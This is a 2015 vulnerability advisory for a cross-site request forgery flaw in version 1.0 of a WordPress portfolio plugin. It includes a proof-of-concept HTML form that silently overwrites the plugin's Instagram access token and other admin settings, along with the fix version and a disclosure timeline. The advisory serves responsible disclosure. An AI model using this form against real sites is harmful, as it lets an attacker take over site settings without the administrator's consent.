WordPress Portfolio 1.0 Cross Site Request Forgery
Posted on 21 July 2015
# Title: Cross-Site Request Forgery Vulnerability in Portfolio Plugin Wordpress Plugin v1.0 # Submitter: Nitin Venkatesh # Product: Portfolio Plugin Wordpress Plugin # Product URL: https://wordpress.org/plugins/portfolio-by-lisa-westlund/ # Vulnerability Type: Cross-site Request Forgery [CWE-352] # Affected Versions: v1.0 # Tested versions: v1.0 # Fixed Version: v1.05 # Link to code diff: https://plugins.trac.wordpress.org/changeset/1175403/portfolio-by-lisa-westlund # Changelog: https://plugins.trac.wordpress.org/log/portfolio-by-lisa-westlund # CVE Status: None/Unassigned/Fresh ## Product Information: Use Instagram to display your portfolio. Choose whether to display all images from your account, or only the ones you tag with a custom hashtag. ## Vulnerability Description: The admin form in Portfolio Plugin v1.0 is susceptible to CSRF. ## Proof of Concept: <form action=" http://localhost/wp-admin/options-general.php?page=instagram-portfolio" method="post"> <input type="hidden" name="wplw_form_submitted" value='Y' /> <input type="hidden" name="wplw_instagram_access_token" value='evil-token1' /> <input type="hidden" name="wplw_instagram_userID" value='nitstorm' /> <input type="hidden" name="wplw_hashtag" value='csrf' /> <input type="hidden" name="wplw_settings_submit" value='Save' /> <input type="submit" value="submit" /> </form> ## Solution: Upgrade to v1.05 or later. ## Disclosure Timeline: 2015-06-03 - Discovered. Mailed developer. 2015-06-05 - Updated v1.05 released. 2015-07-20 - Publishing disclosure on FD mailing list. ## Disclaimer: This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.
